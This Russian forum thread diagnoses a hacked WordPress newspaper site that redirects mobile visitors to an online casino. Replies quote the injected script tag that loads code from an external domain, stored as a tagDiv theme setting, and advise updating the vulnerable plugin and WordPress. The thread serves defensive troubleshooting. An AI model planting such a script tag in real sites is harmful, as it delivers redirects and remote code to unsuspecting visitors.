При заходе на сайт перекидывает на онлайн-казино

ЧП
На сайте с 03.05.2020
Offline
30
765

Добрый вечер. Сразу напишу, велосипед не мой:-)

Хочу помочь коллегам. Есть сайт старой местной газеты. nd58.ru. Примерно месяц назад при заходе на него с мобильных устройств стало перекидывать на какое-то онлайн-казино. Со второй попытки уже заходишь на сам сайт.

Сайт на wordpress. Ваяли сами из какого-то шаблона. Хост у себя на серваке.

Подскажите, куда им копать? 

Artem189
На сайте с 14.10.2015
Offline
158
#1
Чиж-пыж :

Добрый вечер. Сразу напишу, велосипед не мой:-)

Хочу помочь коллегам. Есть сайт старой местной газеты. nd58.ru. Примерно месяц назад при заходе на него с мобильных устройств стало перекидывать на какое-то онлайн-казино. Со второй попытки уже заходишь на сам сайт.

Сайт на wordpress. Ваяли сами из какого-то шаблона. Хост у себя на серваке.

Подскажите, куда им копать? 

Искать дыру, удалять вирус

Лучший плагин кеширования для Wordpress, который выведет нагруженный сайт (с рекламой, счетчиками и т.д.) в зеленую зону и реально сделает по Page Speed 99/100 +- https://clck.ru/37GDWU
egel
На сайте с 20.12.2021
Offline
40
#2

<script src="https://fast.quickcontentnetwork.com"></script>

Не благодарите.

Вячеслав Скоблей
На сайте с 31.07.2012
Offline
92
#3

Вредоносный скрипт прописан в вашей базе данных и выводится на сайте как настройка:  <style id="tdw-css-placeholder"></style><script src="https://fast.quickcontentnetwork.com"></script><style></style>

Как он попал в базу данных - это уже другой вопрос, требующий комплексного подхода к безопасности сайта.

Инструменты для WEB и SEO ( https://tools.100zona.com/?utm_source=searchengines.guru ) в одном месте
GRAFLEKX
На сайте с 05.11.2010
Offline
200
#4
Чиж-пыж :
Сайт на wordpress. Ваяли сами из какого-то шаблона.

Ну тут явно не сами ваяли.

Установлена тема Newspaper, а значит вирус внедрили через старый плагин этой темы: tagDiv Composer

В старом плагине полно уязвимостей и просто очистка ничего не даст, сайт снова накачают через бэк-дор.

Нужно обновлять сам шаблон и его плагины полностью, чтобы исключить новое заражение.

Вирус вам уже показали ребята выше, и он может быть не единственным.

UPD:  WordPress у них тоже сильно устарел - 5.8.8

Мы поможем в поиске работы: стабильная работа для вас ( https://www.rabota.ru ), вакансии и резюме.
ЧП
На сайте с 03.05.2020
Offline
30
#5
Всем огромное спасибо. Передам.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий